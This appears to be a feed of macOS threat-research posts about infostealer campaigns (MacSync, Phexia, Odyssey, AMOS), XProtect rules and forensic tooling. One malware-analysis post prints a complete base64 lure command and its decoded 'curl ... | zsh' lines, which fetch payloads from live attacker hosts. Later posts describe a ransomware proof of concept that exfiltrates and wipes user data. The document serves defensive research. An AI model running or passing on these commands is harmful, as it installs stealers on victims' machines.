Stuart Ashenbrenner 🇺🇸 🇨🇦

I've exited from tech and am doing guided tours in and around Yellowstone. backroadsbear.com Thanks to everyone for some great years! This will be my last post here. 🐬

DFIR analysts who use macOS as their daily driver deserve free and native forensic tooling. So I built one. 🍎 Introducing 𝗜𝗥𝗙𝗹𝗼𝘄 𝗧𝗶𝗺𝗲𝗹𝗶𝗻𝗲 — a timeline analysis app built from the ground up for Mac-based DFIR folks, forensic investigators, or SOC analysts. Built in appreciation of, and inspired by, Eric Zimmerman’s Timeline Explorer. Every feature in this tool was shaped by real IR casework. Handling massive timelines, parsing artifacts here and there, and pivoting across logs during active investigations. I built IRFlow Timeline to be the native macOS timeline analyzer that actually keeps up with a live case. Every button and view is intentional; if it’s in the app, it’s because I needed it mid-case and realized the standard tools fell short. No dependencies. Zero setup. Just drag, drop, and analyze. #dfir #incidentresponse #timeline #macos #threathunitng #digitalforensics

Apple dropping some XProtect updates (v5331) which seem to be every couple of Tuesdays. The new yara rules which look at some AMOS stealers are really interesting in that they're looking at the assembly instructions and the script-based stuff continues to move into XPScripts.yr.

Jamf Threat Labs team always dropping the dopest tools 💜 awesome work @txhaflaire

Hunting for MacOS malware🍎with @osint_barbie revealed how threat actors are now leveraging different malware solutions at the same time on the same payload, in this case, MacSync Stealer + Phexia Botnet for persistence Malicious @evernote results with fake installations guides are being sponsored on Google for common searches like homebrew leading the user to copy paste and run a malicious command (image 1) lite.evernote[.]com/note/c548d6e8-22e3-d45c-b0d2-2ac5ecbd8964 Like usual, payload is base64 encoded echo 'ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlIHBsZWFzZSB3YWl0Li4uJzsgY3VybCAta2ZzU0wgaHR0cDovL29udGFyaW9xdWFsaXR5Y2VkYXIuY29tL2N1cmwvYTBlZDBiZjg4MTY0YjA5NTYwZjM1ODQ2MjI3MWM2YTZlNzFkMjYxMWRiNjNkODVlYmFhZTkwYjI0OWJlOWYyOCB8IHpzaDsgY3VybCAta2ZzU0wgaHR0cDovLzEzOC4xMjQuMTguOS92IHwgYmFzaA==' | base64 -D | zsh decoded curl -kfsSL http://ontarioqualitycedar[.]com/curl/a0ed0bf88164b09560f358462271c6a6e71d2611db63d85ebaae90b249be9f28 | zsh; curl -kfsSL http://138.124.18.9/v and we can already observe the two different malware solutions being leveraged 1. MacSync Stealer As it is usual, URL http://ontarioqualitycedar[.]com/curl/a0ed0bf88164b09560f358462271c6a6e71d2611db63d85ebaae90b249be9f28 will provide a bash script with a b64 + gunzip encoding, in charge of fetching infostealer applescript, executing it and uploading victim log to C2 (image 2) There is not really much newer on this as what is seen before, just that now MacSync scripts uploads the log by splitting the file in 10mb chunks, probably to avoid data loses in big sized logs MacSync bash Script -> f5a3fcc5f5d4754d7262f55ac0a4519af15f93bba847e986a1660820bad1caef 2. Phexia Botnet Interesting part of this post is that a second payload is being executed sequentially as part of a different malware solution to create persistence on the MacOS infected machine From C2 138.124.18.9/v , a b64-encoded apple script is fetched. In this case, it creates LaunchAgent persistence using a plist in ~/Library/LaunchAgents/com.bashsrc.ixxjeiijvivzovon.plist with a b64 applescript content This second payload, nothing far from what is has been seen before, is the responsible to fetch a Phexia Botnet live C2 from t[.]me/phefuckxiabot or if failed, harcoded values (kys[.]cx and kys[.]li), grab and execute Phexia Botnet applescript, which manages to grab specs from the machine and waits until a task is loaded to be executed in the infected machine (image 3) Phexia AppleScript -> 618bff4f4d090ff802d8009dc97a89723757bd179e5cab069fb33c5ec7de61c2 Sponsored results are being paid by different, likely compromised, advertisers (image 4) Transparency users - AR01249564419160014849, AR13446608053252128769, AR06288543453827563521, AR03671228110637891585 By analysing the advertisers, you can already see other active ads sponsoring other malicious Evernote results for MacOS applications or fake command solutions for Transmission, OnyX, Rectangle, Final Cut Pro, PearCleaner, DropOver, 7zip, Flush DNS, NFTS, AppCleaner, OBS, CrossOver, Unarchiver, Open Source Office, Microsoft Office or VLC Player, among others.

1/ We’re tracking a fresh wave of #Odyssey #Stealer activity targeting #macOS users. Over the past days, our telemetry showed newly updated samples spreading primarily across: 🇺🇸 United States 🇫🇷 France 🇪🇸 Spain Today, the picture has clearly changed: the same Odyssey campaign is now affecting users in additional regions, including: 🇬🇧 United Kingdom 🇩🇪 Germany 🇮🇹 Italy 🇨🇦 Canada 🇧🇷 Brazil 🇮🇳 India 🌏Multiple countries across Africa and Asia Two map screenshots, taken only one day apart, highlight a rapidly expanding geographic footprint. Odyssey stealer samples in this campaign appear to be auto-generated, producing many unique hashes with the same size and functionality. See IOCs in the next one below👇

This is an important update to osascript detection on macOS. As @howardnoakley stated, 12 rules were added including one for compiled osascript. These rules appear to provide coverage for many of the common infostealers we see targeting macOS. Let's take a look at a couple🧵

@moonlock_lab @malwrhunterteam I love that now they're trying to even side-step the 'Right-Click + Open' social engineering technique.

@malwrhunterteam An interesting one, thanks for sharing here! According to internals, looks like Odyssey stealer.

"Neuravision.dmg": ea6f39158671ff940a94c433c354e7d27b885ca2d57ce205f87e47f17f934055 🤷‍♂️

1/ After Mosyle shared details of the macOS malware campaign dubbed #SimpleStealth (reported by @arinwaichulis 9to5mac.com/2026/01/09/mos…), spreading via a fake @grok app, we took a closer look at the sample and found it attempting to terminate macOS security and monitoring tools🧵

i did a blog tangentially about digitstealer izzyboop.com/posts/Get-gud-…

Are you using Visual Studio Code? Then this new blog from Jamf Threat Labs might have some takeaways for you! In this blog, we’ll shed light on newer techniques being used by DPRK-linked threat actors related to Contagious Interview, including a newly observed backdoor component. jamf.com/blog/threat-ac… #malware #git #macos #ThreatHunting #jamf

@stuartjash, Chris Ryan, and I have the incredible opportunity/privilege at helping build the @HuntressLabs EDR products. Although we all work on a different OS for these products, one thing we try to drive for our customers is parity. That comes with a handful of challenges as one might imagine. Today, the 3 of us are dropping a blog that goes over the desire to chase parity across these products. Blog: huntress.com/blog/pursuing-… Note: Expect to see more blogs like this, this year. We are driving some really cool features that can replicate across different operating systems.

@PeteMarkowsky @L0Psec @birchb0y Yessir!

@L0Psec @stuartjash @birchb0y That was the one that used the debug entitlements in it's base app right?

These are always a great read. A lot of interesting ones last year. Great opportunity to grab samples and play around with macOS malware. My favorite was the BlueNoroff one (process injection!) @stuartjash and @birchb0y :)

🎉 A decade of Mac malware research 🎉 Just published our 10th annual “The Mac Malware of <year>” report ...2025 edition! For each new sample of 2025, covers: 🔎 IoCs 💉 Infection 💾 Persistence 📡 Capabilities ☣️ Samples for download Dive in 👇 objective-see.org/blog/blog_0x84…

We have a winner (from a commenter over on Linkedin). Thanks everyone! Make sure you check out the books!

I have a copy of THE ART OF MAC MALWARE books to giveaway! If you'd like a copy, please just reply to this that you're interested and I will pick randomly. The only requirement is that you follow @patrickwardle, @objective_see, and are interested in Mac malware.

Related to my previous post, some newly found Clickfix sites that try to lure victims into running malicious bash one-liner commands. Seems they slightly updated their approach on these fake GitHub pages to mask the curl command. Also found some Windows variants, have not seen those earlier myself. Seems to fake that a download for a piece of software is being dynamically compiled. IOCs below #macos #malware #clickfix #infostealer

Updated my ransomware poc to remove the reboot requirement. Full TCC bypass for Tahoe 26.2 chained with a DoS exploit to demo exfiltration of private data and wipe the user's home directory while the user session remains active.

Search: “clear disk space on macOS” Click: legit ChatGPT convo Paste: “safe” Terminal command Boom: AMOS infostealer installed @stuartjash & @JSemonSecurity break down how Attackers are hijacking ChatGPT + Grok to deliver malware. huntress.com/blog/amos-stea…

We found that the macOS infostealer AMOS was using a ChatGPT lure to get users to install it 😔 I know you are tired of stealers, so we didn't cover it too much on its own. But the lure itself is interesting. huntress.com/blog/amos-stea…

I've been seeing a lot of discussion online recently about the changes to Apple's bug bounty program, specifically the downgrading of payouts for TCC bypass vulnerabilities. I was recently asked for my thoughts on this matter. I figured the best way to illustrate the importance of supporting research into this class of bug was to demonstrate the real-world impact. I created a small ransomware POC with clickfix-esque deployment (since that's what the cool kids are doing nowadays). No TCC prompts or any other system warnings. It exfils all sensitive user data and deletes the user's home and iCloud data.